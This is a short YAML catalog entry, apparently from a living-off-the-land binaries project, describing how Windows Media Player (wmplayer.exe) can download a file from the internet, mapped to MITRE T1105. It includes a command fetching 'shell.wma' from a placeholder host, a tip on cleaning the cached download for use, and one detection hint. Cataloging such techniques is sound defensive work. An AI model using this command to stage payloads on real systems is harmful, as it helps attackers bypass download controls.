--- Name: Wmplayer.exe Description: Windows Media Player Author: 'Rutger Flohil' Created: 2024-12-14 Commands: - Command: wmplayer.exe "http://example.com/shell.wma" Description: Windows Media Player will download the file and attempt to play it. File should be encoded and have a compatible extension like wma. Download is stored in INetCache and needs to be cleaned before use. Usecase: Download file from the internet Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Program Files\Windows Media Player\wmplayer.exe - Path: C:\Program Files (x86)\Windows Media Player\wmplayer.exe Code_Sample: - Code: https://pampuna.nl/blog/2024/12/wmplayer.html Detection: - IOC: Network connections originating from wmplayer.exe may be suspicious Resources: - Link: https://pampuna.nl/blog/2024/12/wmplayer.html Acknowledgement: - Person: Rutger Flohil Handle: ''